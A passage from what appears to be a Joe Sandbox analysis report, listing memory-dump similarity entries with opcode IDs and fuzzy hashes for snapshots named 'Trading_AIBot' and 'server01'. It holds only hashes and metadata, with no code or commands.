                                                                                                                                • Instruction Fuzzy Hash: 2B610270D00219CFCB14DFA5D994AADBBB6FF89304F6091A9D8097B264DB346D8ACF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cf21a38fe510b20f55d592859fcb4b2e751eecb9a95ef716c94a71aeac0c3a8b
                                                                                                                                • Instruction ID: 894456f985b90b466e36ebeb0ad4f9a35f238a181c3339764cbcbb14c81e7d2d
                                                                                                                                • Opcode Fuzzy Hash: cf21a38fe510b20f55d592859fcb4b2e751eecb9a95ef716c94a71aeac0c3a8b
                                                                                                                                • Instruction Fuzzy Hash: 5C61B174A00248CFCB44DFA9D5949ADBBB6FF8D310F10916AE905AB365DB31AC46CF14
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0cabea58596bf8d633b0b131b7a9549adc10c502629051f71523a9879aa29eef
                                                                                                                                • Instruction ID: dc34abd440f328d2fb3d03e3176acdbeb5716fcb90a15a0a1c139b59246373d8
                                                                                                                                • Opcode Fuzzy Hash: 0cabea58596bf8d633b0b131b7a9549adc10c502629051f71523a9879aa29eef
                                                                                                                                • Instruction Fuzzy Hash: 6B41BBB1D002489FDB14DFEAC984ADEFFB5AF49314F24802AE859AB254D7349946CF44
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9d702af85a38a1009e9a8ff5d4f76310ac5b55ee01c14360f7820093799e2182
                                                                                                                                • Instruction ID: 07aa43d88b8cd1d770e07f29ba7501cf2bfcf888fbff7320815075d556a27456
                                                                                                                                • Opcode Fuzzy Hash: 9d702af85a38a1009e9a8ff5d4f76310ac5b55ee01c14360f7820093799e2182
                                                                                                                                • Instruction Fuzzy Hash: 3141BCB0D002489FDB14DFEAC984ADEFFB9BF49314F14802AE819AB254D7349946CF54
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Jdq
                                                                                                                                • API String ID: 0-1891755625
                                                                                                                                • Opcode ID: 648c82ca400459ee2d708958b11d65955af57eb6111fe02d689857582120a2b9
                                                                                                                                • Instruction ID: 2e177485d5bf157cc73423083ec6ffbf8a5f1c2bfd0456c2ab7fee3f37546ab8
                                                                                                                                • Opcode Fuzzy Hash: 648c82ca400459ee2d708958b11d65955af57eb6111fe02d689857582120a2b9
                                                                                                                                • Instruction Fuzzy Hash: 3241F474E002088FDB14DFA8D494AEEBBB2EF88301F109069E915A72A4DB349D45CF64
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Jdq
                                                                                                                                • API String ID: 0-1891755625
                                                                                                                                • Opcode ID: ea02a57f7d457922d4e2caa8e8bf1db8119d8a9ca702ef4c862605861aac1f78
                                                                                                                                • Instruction ID: 9a6b9d4fbbcda804923e8a6caf19a2fd1d1c486854142c4603a2fe8da318b1b6
                                                                                                                                • Opcode Fuzzy Hash: ea02a57f7d457922d4e2caa8e8bf1db8119d8a9ca702ef4c862605861aac1f78
                                                                                                                                • Instruction Fuzzy Hash: 2A41E374E002088FDB18DFA9D494AEEBBB2FF88311F109069E915B72A4DB349D45CF64
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Jdq
                                                                                                                                • API String ID: 0-1891755625
                                                                                                                                • Opcode ID: 3e94f253b7a7e3959e2351c37f5e5883a044b71ac4848fa1ec4627e01e342031
                                                                                                                                • Instruction ID: f303ba48292b9650b2cae2759de529a3313e1334dbe14732bd93370a1843be1d
                                                                                                                                • Opcode Fuzzy Hash: 3e94f253b7a7e3959e2351c37f5e5883a044b71ac4848fa1ec4627e01e342031
                                                                                                                                • Instruction Fuzzy Hash: 07111C34A002089FD724DFA5E495BADBBB5FF49322F209054E905A7365DB35AC41CF64
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f824253af38ce9a9f948390d9cca4e08ddd04866c851397f7e4ed7f86f7884b7
                                                                                                                                • Instruction ID: c5d0abc4bab86e9d8348d73574e2580152cced602e2483805c434319fd038aa4
                                                                                                                                • Opcode Fuzzy Hash: f824253af38ce9a9f948390d9cca4e08ddd04866c851397f7e4ed7f86f7884b7
                                                                                                                                • Instruction Fuzzy Hash: A5B28170901229CFCB69DF65C898AADB7B6FB89304F5081EAD40DA7264DB359EC1CF41
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fd54b684b2dd95c9212e48ee95cc5036525ac338e1f5a421c09549b9734c19b4
                                                                                                                                • Instruction ID: f3f79b13d01c499b619a80479656238cc5d9642861eb7186686fe4fd4fc796db
                                                                                                                                • Opcode Fuzzy Hash: fd54b684b2dd95c9212e48ee95cc5036525ac338e1f5a421c09549b9734c19b4
                                                                                                                                • Instruction Fuzzy Hash: D8B27170901229CFCB69DF65C898AADB7B6FB89304F5081EAD40DA7264DB359EC1CF41
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4ad03d411207137ec644d96e5f7720e767d24449686125da1fd35e5149eebaf3
                                                                                                                                • Instruction ID: 803d2f1c003ea36c050f11f4dafcc330744743dd2fae3240bee53bf2030e9eed
                                                                                                                                • Opcode Fuzzy Hash: 4ad03d411207137ec644d96e5f7720e767d24449686125da1fd35e5149eebaf3
                                                                                                                                • Instruction Fuzzy Hash: B262CE74901219CFCB65DF64D898BAEBBB2FF49300F1081EAD50AA7264DB349E85CF41
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9015d4527e299880146c261c50294352081d001a87a0c846250f6bdefd1c7e72
                                                                                                                                • Instruction ID: be8c745dab4a9933e9820d0186bcaf4cd52b3aa5a535e418677a851d17ebdbab
                                                                                                                                • Opcode Fuzzy Hash: 9015d4527e299880146c261c50294352081d001a87a0c846250f6bdefd1c7e72
                                                                                                                                • Instruction Fuzzy Hash: BE62CE74901219CFCB65DF64D998BAEBBB2FB49300F1081EAD50AA7364DB349E85CF41
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4b6ee5f29d2baaa8a1020ec1a7ffefd7e2486cb26a4d5795ca3bec0fb07edc47
                                                                                                                                • Instruction ID: f24c14cdb4308affdf26547c3925e31cc74bf8a3531b955becaa805870bad11a
                                                                                                                                • Opcode Fuzzy Hash: 4b6ee5f29d2baaa8a1020ec1a7ffefd7e2486cb26a4d5795ca3bec0fb07edc47
                                                                                                                                • Instruction Fuzzy Hash: F041F0B0D04288DFDB15DFEAC984A9EFFF9AF49304F14846AE848AB254CB345885CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f7d3823285d72108c6f06384644368c0059e406fc814b1e69597201958cdcf82
                                                                                                                                • Instruction ID: b67ae7de6120d44b05592d902065dea3845e6173b8665b1f1fdc79ea1fb0afac
                                                                                                                                • Opcode Fuzzy Hash: f7d3823285d72108c6f06384644368c0059e406fc814b1e69597201958cdcf82
                                                                                                                                • Instruction Fuzzy Hash: E6B1DD74A012298FDB64DF68C994B9DBBB6FB49304F1085EAD80DA7250DB30AE85CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2e63b37a73a7e64faf69b1f9c02b8bf43820e002aa4a70dfe7d768d3408eb77a
                                                                                                                                • Instruction ID: f9e7a09b999b73de64bd0c45436a8593a5ebcd65bb2f48c6c2f0f57f1080c334
                                                                                                                                • Opcode Fuzzy Hash: 2e63b37a73a7e64faf69b1f9c02b8bf43820e002aa4a70dfe7d768d3408eb77a
                                                                                                                                • Instruction Fuzzy Hash: FC51D174A00248CFCB48DFA9D594AADBBB6FF89314F10916AE905AB365DB31AC45CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 73fde8aa298cf20857a86db546030a59bd8660d2ee5045ddb7e9caa7d0352d0e
                                                                                                                                • Instruction ID: d192dc0da9a921c506107483a29191a8e5121fcb917b54ac98c17aefc2004760
                                                                                                                                • Opcode Fuzzy Hash: 73fde8aa298cf20857a86db546030a59bd8660d2ee5045ddb7e9caa7d0352d0e
                                                                                                                                • Instruction Fuzzy Hash: 5041B274D00208CFDB44DFA9E4986EDFBF9AB49300F50916AE819AB350EB385D46CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9c6b1f969b135dbd44d9b70c9ed8e6ea4e26393299e1cb3f3362c33bce36de0a
                                                                                                                                • Instruction ID: dd1dc0f7ea39a1752484f4a4df4a579ecce5ca1f273045399183b2148e79d486
                                                                                                                                • Opcode Fuzzy Hash: 9c6b1f969b135dbd44d9b70c9ed8e6ea4e26393299e1cb3f3362c33bce36de0a
                                                                                                                                • Instruction Fuzzy Hash: 8E41BEB0D002489FDB14DFEAC984A9EFFF9AF48314F14842AE818AB254DB749985CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 42940af6c9911f4410c9e71e6a702fd9ce7e1430a9ba6bd3724e1b21af388785
                                                                                                                                • Instruction ID: 0b6416c39a5ad384a00e6f7581b6e23c1dcc881538097ec03c192b9a8b3388b2
                                                                                                                                • Opcode Fuzzy Hash: 42940af6c9911f4410c9e71e6a702fd9ce7e1430a9ba6bd3724e1b21af388785
                                                                                                                                • Instruction Fuzzy Hash: 1D31F274E012098FCB08DFB9D454AEEBBB2EF89304F6095AAD80577390CB366D41CB65
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4458fe5471b4d11ef86c1bf2f042f6224ea45d5d6ecc55756d25cb31eafff3fd
                                                                                                                                • Instruction ID: 0674af086dd01a91c5286ec69d0f0200ae90ed9374bda18b02fca48236095d2e
                                                                                                                                • Opcode Fuzzy Hash: 4458fe5471b4d11ef86c1bf2f042f6224ea45d5d6ecc55756d25cb31eafff3fd
                                                                                                                                • Instruction Fuzzy Hash: 2D21C074E012098FCB08DFA9D494AEEB7B6EF89300F6094AAD415B7394CB366D41CB65
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 378b354d0d477fecac423b240fcfcd9f1d63b882118ff4977c200bbaf2bada93
                                                                                                                                • Instruction ID: 1bd2a491cf14584c2eeb8705f1791b35aaaec9c13c1e840f47357fb1c1f9e92b
                                                                                                                                • Opcode Fuzzy Hash: 378b354d0d477fecac423b240fcfcd9f1d63b882118ff4977c200bbaf2bada93
                                                                                                                                • Instruction Fuzzy Hash: DF218970C093499FDB00EFB895593AEBFB0EB02315F0458AAC841A31A2D7784648DB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0dd22796a8a186e9f7ea394dd46ad1bf81cd0f392d35bb58dfc7bd40aee53c39
                                                                                                                                • Instruction ID: c03a6ae62fce3e4809c278d52bac9d3934de4eb2a8081b92f983012f04d81331
                                                                                                                                • Opcode Fuzzy Hash: 0dd22796a8a186e9f7ea394dd46ad1bf81cd0f392d35bb58dfc7bd40aee53c39
                                                                                                                                • Instruction Fuzzy Hash: 62017CB4C04209DFDB04EFB9C41D7AEBFB0EB05312F4498A99816A3290DB780A44DF91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9f457c8ec1b8dd7797d17e0873dcd43435ba98262703df2e82ee4d725146d8ff
                                                                                                                                • Instruction ID: 18bb964be7d6f7f8ddf54289af16402decc9b6dcf186c965137acc4d8b391c08
                                                                                                                                • Opcode Fuzzy Hash: 9f457c8ec1b8dd7797d17e0873dcd43435ba98262703df2e82ee4d725146d8ff
                                                                                                                                • Instruction Fuzzy Hash: 63F0F874D00255CFCB64DFA9D4596ACFBB4EB4A312F0465A6E809A3260EB34A985CF24
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3253f5b50bcab4fa4937abe5f49eac5d1471e846f98cc7bc69100e69ede305b4
                                                                                                                                • Instruction ID: cee1fa55470e1e1975c10a349b36b82e7cb485263815ad5dc0079a1a4bdadae8
                                                                                                                                • Opcode Fuzzy Hash: 3253f5b50bcab4fa4937abe5f49eac5d1471e846f98cc7bc69100e69ede305b4
                                                                                                                                • Instruction Fuzzy Hash: 15F08C74911208DFC304DF68E644B28BFB4FB09311F10429AED0493362EB309945CB40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a19fa99bcef8a9862809b737213f7c5951d65f69da2132377ed345e87a5dd683
                                                                                                                                • Instruction ID: 950ab1c89f87b5a7e2e931b107d1eafa74cb5072ee824d0065cd35d9dfa9b730
                                                                                                                                • Opcode Fuzzy Hash: a19fa99bcef8a9862809b737213f7c5951d65f69da2132377ed345e87a5dd683
                                                                                                                                • Instruction Fuzzy Hash: DAE0AB30502348DFC701DFB4EA0069CBF78EB45201F40409EDC0493111EB341E04DB40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 88ad074d3acb2ba19a71422fd699134f0f7919fc37805a320151d98a477d3220
                                                                                                                                • Instruction ID: 9d35477700ff827c1fc084ea4b408ae44214fd6731dded4a065ee5bf1f60bd56
                                                                                                                                • Opcode Fuzzy Hash: 88ad074d3acb2ba19a71422fd699134f0f7919fc37805a320151d98a477d3220
                                                                                                                                • Instruction Fuzzy Hash: C5E01AB4910208DFC744EF68E558A69BFB8FB09311F5042AADD08A3361EB30ED85CF91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8b9a3db1f95aebe4c8930da7dcb72ed347a73df538e19b471f14e6bf9bfa039e
                                                                                                                                • Instruction ID: c7108c124ef4409dd2893ae7043294e32682cfc139fc2d80f1d3776063222f29
                                                                                                                                • Opcode Fuzzy Hash: 8b9a3db1f95aebe4c8930da7dcb72ed347a73df538e19b471f14e6bf9bfa039e
                                                                                                                                • Instruction Fuzzy Hash: 4FE08670601108DFDB01DFB9E645A5DFBBDEB44301F908569DD0593224EB355E04DB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8ccf1549057f300ed3edee46e900a1340fee2829015804d362e318040484b552
                                                                                                                                • Instruction ID: 9b1696add73cf1a9ab01061bfb436633a2abec057219c337b72f521676388cbc
                                                                                                                                • Opcode Fuzzy Hash: 8ccf1549057f300ed3edee46e900a1340fee2829015804d362e318040484b552
                                                                                                                                • Instruction Fuzzy Hash: 7BD0A7718053895BD351DBB5A90A754FF7CE712316F88429CEE14A3103EB294480DBA5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b32f4d58f2a72c4d247acce618b091f34139ccd225921f8d3f85d3cf2a301eff
                                                                                                                                • Instruction ID: d3911095a069c0ec70dc00f46ced898b3c8f3942ba33246e00520b42794c9ced
                                                                                                                                • Opcode Fuzzy Hash: b32f4d58f2a72c4d247acce618b091f34139ccd225921f8d3f85d3cf2a301eff
                                                                                                                                • Instruction Fuzzy Hash: 26C080708113089FD314DFBCA406B65FF7CE702356F404159ED0853201DB755450DBA6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1402110988dc7a3a030e994b74a05dbb8dfe299d2426804b7fa672cd5f127f65
                                                                                                                                • Instruction ID: 30cb00eade6815c85129c31e78f00a9528acf941592e2d4924bd95273e951e4f
                                                                                                                                • Opcode Fuzzy Hash: 1402110988dc7a3a030e994b74a05dbb8dfe299d2426804b7fa672cd5f127f65
                                                                                                                                • Instruction Fuzzy Hash: 23C0807081130C9FC714DFA9A405B55FF7CE702312F800258FE0853105EB715490D7B5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0a10dd8881bb42b16b0b775d6f942e2277ff91f10517496ae5d136ed73d799cd
                                                                                                                                • Instruction ID: 04dd21b7ea3c2f82c8580badc94020f6eb6b2fa8d73d43ea2dd87db33bac32af
                                                                                                                                • Opcode Fuzzy Hash: 0a10dd8881bb42b16b0b775d6f942e2277ff91f10517496ae5d136ed73d799cd
                                                                                                                                • Instruction Fuzzy Hash: 77410FB0D002489FDB14DFE9C984AEEFBF9AF48300F20842AE815BB254DB759946CF54
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3484828761.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_c20000_server01.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: N
                                                                                                                                • API String ID: 0-1130791706
                                                                                                                                • Opcode ID: f226151702c352a0db1cea48c052f95a03bd0d3dfb0311d4a72a0f23da8618b7
                                                                                                                                • Instruction ID: 34d26a589b1b918e4b3141b0024dafcf65e7c3e3e84faeb5bce74066c36de760
                                                                                                                                • Opcode Fuzzy Hash: f226151702c352a0db1cea48c052f95a03bd0d3dfb0311d4a72a0f23da8618b7
                                                                                                                                • Instruction Fuzzy Hash: 9773E531C1075A8ECB11EF68C854AADFBB1FF99300F51D69AE44967221EB70AAD4CF41
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3484828761.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_c20000_server01.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 51c9b5b0c5a63c31caf5528169e56a0f4899ca4f4c1b44497e322c01347bc878
                                                                                                                                • Instruction ID: 09676609d0b3a774da0210036d1d3734a49e40b315d9b9dab39cbbd8b142d66b
                                                                                                                                • Opcode Fuzzy Hash: 51c9b5b0c5a63c31caf5528169e56a0f4899ca4f4c1b44497e322c01347bc878
                                                                                                                                • Instruction Fuzzy Hash: 90C1AE78E01218CFDB14DFA5D994B9DBBB2FF88301F2081A9D809A7365DB359A85CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3484828761.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_c20000_server01.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c05efb591b3591e4783df1671fab723ce8952144ad00fd813f9930468cec7e8f
                                                                                                                                • Instruction ID: 3a9d4540cab1a942979128d0b0bf0f0e5b1a1f1cf209fb2c46e2ddc712a0ad9c
                                                                                                                                • Opcode Fuzzy Hash: c05efb591b3591e4783df1671fab723ce8952144ad00fd813f9930468cec7e8f
                                                                                                                                • Instruction Fuzzy Hash: 00A11670D00218CFDB14DFA9D994BDDBBB1FF88305F209269E408AB292DB759985CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3484828761.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_c20000_server01.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8188cc17cc52a2aed59a61dda4de327d9c598dc118b77036a8bfb8a1297e9af2
                                                                                                                                • Instruction ID: aaf1cb57ffe9d277b774ee8a6bd33341f28468e206d6ff8e037a25150252d67f
